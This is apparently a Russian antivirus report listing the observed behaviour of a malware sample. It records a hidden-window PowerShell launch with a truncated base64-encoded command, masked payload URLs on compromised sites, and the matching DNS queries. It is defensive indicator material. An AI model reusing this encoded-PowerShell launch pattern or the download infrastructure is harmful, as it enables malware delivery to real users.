Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AH...
- http://ta###hesht.ir/images/Provx00a/
- http://go####rbsmart.ru/
- http://tc###tner.ru/wp-includes/nr8/
- http://te####n.utcc.ac.th/wp-admin/SquR/
- http://ou####ductreview.in/pokjbg746ihrtr/a1kzwc/
- DNS ASK ta###hesht.ir
- DNS ASK go####rbsmart.ru
- DNS ASK ta###group.ir
- DNS ASK tc###tner.ru
- DNS ASK te####n.utcc.ac.th
- DNS ASK ou####ductreview.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AH...' (со скрытым окном)